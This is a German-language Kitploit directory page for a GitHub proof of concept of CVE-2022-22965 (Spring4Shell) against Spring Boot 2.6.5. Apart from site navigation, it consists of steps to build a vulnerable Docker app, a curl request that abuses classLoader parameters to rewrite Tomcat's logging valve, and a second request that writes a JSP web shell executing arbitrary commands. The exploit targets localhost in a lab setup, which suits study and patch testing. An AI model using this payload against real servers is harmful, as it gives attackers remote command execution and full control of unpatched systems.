Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
SSE4-CVE-2022-22965 — CVE-2022-22965 Proof of Concept | Kitploit
Tools/GitHubGitHub/clemoregan/sse4-cve-2022-22965
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubclemoregan/sse4-cve-2022-22965

SSE4-CVE-2022-22965

CVE-2022-22965 Proof of Concept

Repository anzeigen
11vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Spring Boot CVE-2022-22965

Docker PoC für CVE-2022-22965 mit Spring Boot Version 2.6.5

Erste Schritte

  1. Führen Sie docker compose up --build aus, um die verwundbare Anwendung zu bauen und zu starten.
  2. Führen Sie curl -H "Accept: text/html;" "http://localhost:8080/demo/sample?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7b%63%6f%64%65%7d%69&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" aus, um die Tomcat-Konfigurations-Valve zu ändern.
  3. Führen Sie curl -H "Accept: text/html;" -H "code: <% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(String.valueOf(1337))).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1) { out.println(new String(b)); } %>" "http://localhost:8080/demo/x" aus, um die Web-Shell zu erstellen.
Tool herunterladen
  • Öffnen Sie Ihren Browser und gehen Sie zu http://localhost:8080/shell.jsp?1337=id, um Befehle auszuführen.